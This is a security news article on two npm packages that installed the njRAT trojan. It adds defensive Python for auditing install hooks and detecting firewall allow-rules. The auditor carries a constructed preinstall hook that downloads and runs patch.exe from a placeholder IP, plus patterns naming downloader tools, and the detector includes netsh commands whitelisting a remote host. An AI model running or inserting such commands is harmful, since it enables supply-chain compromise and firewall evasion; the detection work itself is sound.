Malicious npm packages installed the njRAT trojan on infected machines

Malicious npm packages installed njRAT
Written by Emma Davis

Another piece of malware has been found in npm (Node Package Manager), the JavaScript package registry: two malicious npm packages installed the njRAT trojan on the machines of the developers who downloaded them.

Developers who installed the jdb.js and db-json.js packages were infected with the njRAT remote access trojan. Both packages were removed from npm earlier this week.

Both packages were published by the same author and were described as tools for working with JSON files. They were uploaded to npm last week and downloaded more than 100 times before Sonatype discovered the malware in them.


According to Sonatype analysts, the packages contained a malicious script that ran as soon as a developer installed either of the two libraries. The script performed basic reconnaissance on the host and then tried to download and run a file named patch.exe (a sample is available on VirusTotal), which in turn installed the njRAT trojan on the affected machine. This malware is also known as Bladabindi and has been used by cybercriminals since at least 2015.
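The mechanism described above is an npm lifecycle hook: a `preinstall`, `install` or `postinstall` entry in package.json that npm executes automatically during `npm install`. The following Python script, added here as an illustration (it is not Sonatype's tooling and the manifests it checks are constructed, not the real jdb.js or db-json.js manifests), audits a manifest for such hooks and flags ones that look like they fetch and execute code. The pattern list and the 203.0.113.10 address are the editor's assumptions.

```python
"""Audit an npm package manifest for install-time lifecycle hooks.

Added example; not Sonatype's tooling and not the real jdb.js manifest.
The two manifests below are constructed to show the "runs a bundled file"
and the "download and run" shapes of an install hook.
"""
import json
import os
import re

# Hooks npm runs automatically when a package is installed as a dependency,
# unless `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) is used.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristics (assumptions, not a complete list) for a hook that fetches and executes code.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"\b(curl|wget|certutil|bitsadmin|Invoke-WebRequest|iwr)\b", re.I), "downloader"),
    (re.compile(r"\.exe\b", re.I), "Windows executable"),
    (re.compile(r"\b(powershell|cmd\.exe|cmd /c)\b", re.I), "shell spawn"),
    (re.compile(r"\b(netsh|firewall)\b", re.I), "firewall change"),
    (re.compile(r"\b(node -e|eval\()", re.I), "inline eval"),
]


def audit_manifest(manifest_text):
    """Return one finding per install hook present, with the reasons it looks risky."""
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        reasons = [label for pattern, label in SUSPICIOUS_PATTERNS if pattern.search(command)]
        # A hook that only runs a bundled .js file says nothing by itself; the article's
        # packages hid the download inside such a file, so it still warrants review.
        if not reasons and re.search(r"\bnode\s+\S+\.js\b", command):
            reasons.append("runs a bundled script at install time")
        findings.append({"hook": hook, "command": command, "reasons": reasons})
    return findings


def audit_node_modules(root):
    """Audit every package.json under root/node_modules, e.g. after an install with --ignore-scripts."""
    results = {}
    for dirpath, _dirs, files in os.walk(os.path.join(root, "node_modules")):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        with open(path, encoding="utf-8") as fh:
            try:
                findings = audit_manifest(fh.read())
            except ValueError:
                continue  # not valid JSON; skip rather than crash the sweep
        if findings:
            results[path] = findings
    return results


# Constructed: looks like a JSON helper, but runs a bundled file at install time.
CONSTRUCTED_HELPER = json.dumps({
    "name": "json-file-helper",
    "version": "1.0.0",
    "description": "Helpers for working with JSON files",
    "main": "index.js",
    "scripts": {"postinstall": "node module.js", "test": "node test.js"},
})

# Constructed: the hook itself downloads and runs an executable (hypothetical IP address).
CONSTRUCTED_DROPPER = json.dumps({
    "name": "json-file-helper-2",
    "version": "1.0.0",
    "scripts": {
        "preinstall": 'powershell -c "Invoke-WebRequest http://203.0.113.10/patch.exe -OutFile patch.exe; .\\patch.exe"'
    },
})

if __name__ == "__main__":
    for text in (CONSTRUCTED_HELPER, CONSTRUCTED_DROPPER):
        for finding in audit_manifest(text):
            print(finding["hook"], "->", finding["command"], "|", ", ".join(finding["reasons"]))
```

Installing with `npm install --ignore-scripts` and then running `audit_node_modules(".")` lets you read every hook before deciding whether to run them; a package that needs an install hook at all is worth a second look, and one whose hook reaches out to the network is worth a very close one.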

To let njRAT run unhindered, the patch.exe loader first modified the local Windows Firewall, adding a whitelist rule for its command-and-control server before downloading the malware.
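A loader that whitelists its own C2 before pulling the payload leaves a detectable trace on the endpoint. The Python below is an added example (not part of the article or Sonatype's report) of detection logic over process-creation telemetry; it assumes the rule is created with netsh, in either the legacy `netsh firewall` or the `netsh advfirewall` syntax, which the article does not state, and the events it runs over are constructed in Sysmon Event ID 1 field style with a hypothetical IP address and paths.

```python
"""Flag process-creation events in which a Windows Firewall allow-rule is added.

Added example; not from the article or Sonatype's report. The article says only
that the loader whitelisted its C2 server before downloading njRAT. The assumption
here is that such a rule is created with netsh. Events are constructed in Sysmon
Event ID 1 field style; none of them is real telemetry.
"""
import re

LEGACY_RULE = re.compile(r"\bfirewall\s+(add|set)\s+allowedprogram\b", re.I)
ADVFW_RULE = re.compile(r"\badvfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b", re.I)
REMOTE_IP = re.compile(r"\bremoteip=(\S+)", re.I)
# Parent launched from a user-writable location, where a freshly downloaded loader would sit.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop)\\|\\temp\\", re.I)


def detect_firewall_allow(events):
    """Return an alert for every netsh invocation that adds an allow-rule."""
    alerts = []
    for ev in events:
        image = ev.get("Image", "")
        if not image.lower().endswith("\\netsh.exe"):
            continue
        cmd = ev.get("CommandLine", "")
        legacy = LEGACY_RULE.search(cmd)
        advfw = ADVFW_RULE.search(cmd)
        if not (legacy or advfw):
            continue
        parent = ev.get("ParentImage", "")
        ip = REMOTE_IP.search(cmd)
        alerts.append({
            "time": ev.get("UtcTime"),
            "syntax": "legacy" if legacy else "advfirewall",
            "remote_ip": ip.group(1) if ip else None,
            "parent": parent,
            # A firewall change driven by a binary in %TEMP% or AppData is the shape described in the article.
            "parent_in_user_path": bool(USER_WRITABLE.search(parent)),
        })
    return alerts


CONSTRUCTED_EVENTS = [
    {   # netsh launched by a loader in %TEMP%, allowing traffic to one remote host (hypothetical IP)
        "UtcTime": "2020-12-03 10:14:02.113",
        "Image": r"C:\Windows\System32\netsh.exe",
        "CommandLine": 'netsh advfirewall firewall add rule name="Windows Update" dir=out action=allow remoteip=203.0.113.10',
        "ParentImage": r"C:\Users\dev\AppData\Local\Temp\patch.exe",
    },
    {   # benign netsh use, must not alert
        "UtcTime": "2020-12-03 10:14:05.541",
        "Image": r"C:\Windows\System32\netsh.exe",
        "CommandLine": "netsh interface ip show config",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # legacy syntax whitelisting the program itself, no remote host in the rule
        "UtcTime": "2020-12-03 10:14:09.002",
        "Image": r"C:\Windows\System32\netsh.exe",
        "CommandLine": r'netsh firewall add allowedprogram "C:\Users\dev\AppData\Local\Temp\patch.exe" "Java Update" ENABLE',
        "ParentImage": r"C:\Users\dev\AppData\Local\Temp\patch.exe",
    },
    {   # administrator opening a database port from an elevated shell: alerts, but low priority
        "UtcTime": "2020-12-03 11:00:00.000",
        "Image": r"C:\Windows\System32\netsh.exe",
        "CommandLine": 'netsh advfirewall firewall add rule name="SQL Server" dir=in action=allow protocol=TCP localport=1433',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
]

if __name__ == "__main__":
    for alert in detect_firewall_allow(CONSTRUCTED_EVENTS):
        print(alert)
```

The `parent_in_user_path` flag is what separates the two interesting hits from routine administration; any remote IP extracted from a rule created this way is a candidate network indicator to pivot on. Where Sysmon is not deployed, Windows Security event 4946 (a rule was added to the firewall exception list) records the same change, though without the command line.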

Interestingly, only the jdb.js package exhibited this behaviour; the second package, db-json.js, simply loaded the first one, apparently to mask the malicious activity, Sonatype's experts say.

Because njRAT is a serious threat, the npm security team recommends that affected developers treat their systems as fully compromised.

Removing the malicious package alone is not enough in this case, because, as the experts stress, "there is no guarantee that removing a package will remove all the malware that appears as a result of its installation."

It should be noted that since August this year, cybercriminals' interest in npm has clearly increased. In recent months, researchers have repeatedly discovered malicious packages designed to steal data from infected systems.

Attackers are evidently targeting developers in order to steal credentials for private projects, source code and intellectual property, or to stage attacks further down the supply chain.

As a reminder, an npm package was recently caught stealing information from browsers and Discord, and Sonatype security researchers discovered a malicious npm package with a backdoor.


About the author

Emma Davis

I'm a writer and content manager (I recently completed a bachelor's degree in Marketing at Gustavus Adolphus College). For now, I have a deep drive to study cyber security.
